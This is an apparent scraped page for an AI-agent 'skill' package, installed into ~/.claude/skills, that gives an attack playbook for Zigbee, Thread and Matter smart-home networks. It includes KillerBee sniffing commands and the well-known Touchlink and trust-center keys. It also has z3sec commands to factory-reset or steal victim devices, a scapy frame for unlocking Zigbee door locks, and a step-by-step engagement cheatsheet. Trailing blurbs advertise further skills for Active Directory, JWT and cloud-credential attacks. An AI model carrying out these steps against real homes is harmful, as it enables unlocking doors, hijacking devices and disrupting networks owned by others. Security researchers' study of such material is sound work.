offensive-zigbee-thread-matter
Offensive-zigbee-thread-matter is a mesh-protocol attack toolkit targeting IEEE 802.15.4-based smart-home networks, covering sniffing via TI CC2531/CC2540 or Sonoff dongles with KillerBee, Touchlink commissioning abuse using well-known transport keys, and ZCL command injection for lights and locks. Deploy against Zigbee door locks, lighting systems, Thread networks, and Matter-enabled devices to capture network credentials, perform replay attacks, or remotely control commissioned devices.
git clone --depth 1 https://github.com/SnailSploit/Claude-Red /tmp/offensive-zigbee-thread-matter && cp -r /tmp/offensive-zigbee-thread-matter/Skills/wireless/offensive-zigbee-thread-matter ~/.claude/skills/offensive-zigbee-thread-matterSKILL.md
# Zigbee / Thread / Matter Attacks 802.15.4-based mesh protocols underpin most "smart home" devices. Zigbee is widely deployed and has well-known crypto-key-reuse issues; Thread (modern, IPv6-based) ships with stronger defaults; Matter unifies their commissioning model with stronger crypto but still has implementation pitfalls. ## Quick Workflow 1. Sniff target frequency (channels 11–26 in 2.4 GHz) 2. Identify network coordinator and joining devices 3. For Zigbee: try Touchlink commissioning with the well-known key 4. Capture join-key exchange when devices commission 5. Replay or inject ZCL/ZHA cluster commands --- ## Hardware | Adapter | Use | |---|---| | TI CC2531 USB stick | Cheap, works with Zigbee2MQTT, KillerBee | | TI CC2540 / CC2652 | Zigbee + Thread + BLE | | Sonoff Zigbee Dongle E (CC2652P) | Modern, well-supported | | ApiMote (KillerBee dev) | Multi-channel, scapy-dot15d4 | | HackRF + appropriate firmware | Lower-level RF flexibility | ## Discovery + Sniffing ```bash # KillerBee suite zbstumbler -i 0 # find Zigbee networks zbid # ID coordinators zbdump -c 11 -w zigbee.pcap # dump channel 11 to pcap # scapy-dot15d4 for crafted frames python3 >>> from scapy.contrib.dot15d4 import * >>> sniff(iface='/dev/ttyACM0', count=50) ``` In Wireshark with the dot15d4 + zbee_nwk dissectors, you'll see frame counters, network keys (if joined), and ZCL commands. ## Touchlink Commissioning Abuse Touchlink (used by Zigbee 3.0 commissioning, especially in lighting) uses a **well-known transport key**: ``` 0x9F559A553B7A6B2C5C4FBB4E84956F3D ``` Many consumer Zigbee bulbs / strips accept Touchlink commissioning from any nearby radio with this key — joining them to your network or stealing them from theirs. ```bash # z3sec — Zigbee 3 commissioning attack toolkit git clone https://github.com/IoTsec/Z3sec python z3sec_inter_pan.py --command "factory_reset_request" --device <addr> python z3sec_inter_pan.py --command "join_network" --network <PANID> ``` Outcomes: - Factory-reset victim devices remotely (DoS / mass disrupt) - Steal lights / sensors into attacker network - Read network keys after joining device-to-network ## Network Key Capture During Joins ```bash # Capture coordinator + joining device exchange zbdump -c <ch> -w join.pcap # Decrypt if you obtain the trust center link key # Older Zigbee 1.x networks used a default trust center link key: # ZigBeeAlliance09 # Modern networks use device-specific install codes ``` Once you have the network key, all traffic on that mesh is decrypted in Wireshark. ## ZCL / ZHA Cluster Command Abuse Zigbee Cluster Library defines on/off/level/lock clusters. With network key, you can issue commands as any device: ```python # scapy-dot15d4 frame to unlock a door lock from scapy.contrib.dot15d4 import * from scapy.contrib.zigbee import * frame = Dot15d4FCS()/Dot15d4Data()/ZigbeeNWK(...)/ZigbeeAppDataPayload(...)/ZCLDoorLock(...) sendp(frame, iface='/dev/ttyACM0') ``` The same primitive opens locks, toggles switches, dims lights, or floods the network with control traffic. ## Thread Specifics Thread (used by Apple HomePod, Nest, Eero) uses 802.15.4 with IPv6 (6LoWPAN) and stronger commissioning crypto. - Network credential is a **commissioner-distributed PSKc** - Devices join with the commissioner present - Mesh commissioning protocol is over UDP/CoAP Attack surface: - PSKc theft from commissioner devices (mobile app companion, Apple Home, Nest app) - Reusing a leaked credential to join target network - 6LoWPAN routing attacks (rank manipulation, sinkhole) ## Matter Commissioning Matter unifies Zigbee/Thread/Wi-Fi device onboarding under one commissioning model: - QR code or manual setup code grants commissioning permission - Bluetooth LE used for initial commissioning - Subsequent communication over Wi-Fi or Thread Attack surface: - Setup-code reuse / replay if commissioning window not closed - BLE-MITM during initial commissioning (see `offensive-bluetooth-ble`) - Fabric-attestation flaws in early implementations ## Detection - Coordinator may log unexpected device joins - Hub apps surface "new device" notifications — commonly ignored by users - Wireshark/Sonoff captures from defenders are rare — most environments don't monitor 802.15.4 ## Engagement Cheatsheet ```bash # 1. Identify networks + channels zbstumbler -i 0 # 2. Sniff target channel zbdump -c <ch> -w cap.pcap # Open in Wireshark with dot15d4/zigbee dissectors # 3. Touchlink attack on consumer Zigbee 3.0 lighting python z3sec_inter_pan.py --command "factory_reset_request" --target <addr> # 4. Steal device into attacker network python z3sec_inter_pan.py --command "join_network" --target <addr> # 5. With network key, issue ZCL commands directly # (custom scapy-dot15d4 + zbee_nwk frames) # 6. For Thread: focus on commissioner / PSKc theft from companion apps ``` --- ## Key References - KillerBee: github.com/riverloopsec/killerbee - Z3sec: github.com/IoTsec/Z3sec - "Zigbee Insecurity" research (CON Black Hat talks) - Thread spec: threadgroup.org/support - Matter / CSA spec: csa-iot.org/all-solutions/matter - Source: https://github.com/SnailSploit/offensive-checklist/blob/main/wireless.md
Active Directory attack methodology for internal network red team engagements. Covers reconnaissance (BloodHound, PowerView, ADExplorer), credential abuse (Kerberoasting, ASREProasting, NTLM relay, LLMNR/NBT-NS poisoning), privilege escalation (ACL abuse, GPO abuse, unconstrained/constrained delegation), lateral movement (Pass-the-Hash, Pass-the-Ticket, Overpass-the-Hash, WMI/WinRM/PsExec), persistence (Golden/Silver/Diamond Tickets, DCSync, DCShadow, AdminSDHolder, Skeleton Key), forest trust attacks, ADCS abuse (ESC1-ESC15), and modern MDI/Defender for Identity evasion. Use when assessing on-prem AD, hybrid AD/Entra ID environments, or ADCS deployments.
JWT attack methodology for penetration testers. Covers algorithm confusion (alg:none, RS256→HS256), weak HMAC secret brute force, kid parameter injection (SQLi, path traversal), jku/x5u/jwk header injection, JWKS cache poisoning, JWS/JWE confusion, timing attacks, and mobile JWT storage extraction. Use when testing JWT-based authentication, hunting auth bypass via token manipulation, or evaluating JWT implementation security in web or mobile apps.
Cloud security attack methodology covering AWS, Azure, and GCP. Includes credential harvesting (IMDS, ~/.aws, env vars, leaked CI secrets, instance roles), enumeration with cloud-specific tools (pacu, ScoutSuite, Prowler, ROADtools, gcp_enum), privilege escalation paths (IAM PassRole, AssumeRole chains, Lambda/Functions privilege flips, Azure Owner-on-self, GCP serviceAccountTokenCreator), persistence techniques (IAM user/key creation, AAD app registration, GCP svc account key creation, EventBridge/Logic Apps backdoors), data exfiltration (S3/Blob/GCS, snapshot share, RDS/CosmosDB/Cloud SQL exfil), cloud-native lateral movement (cross-account assume, Azure AD multi-tenant, GCP project hierarchy), serverless attacks (Lambda env vars, layer hijack, Step Functions), Kubernetes-on-cloud (EKS/AKS/GKE-specific paths to node and AWS metadata), and CSPM evasion (CloudTrail blind spots, GuardDuty mute, Sentinel rule shaping). Use when the engagement scope is cloud accounts, when you've stolen cloud credentials, or when assessing cloud posture.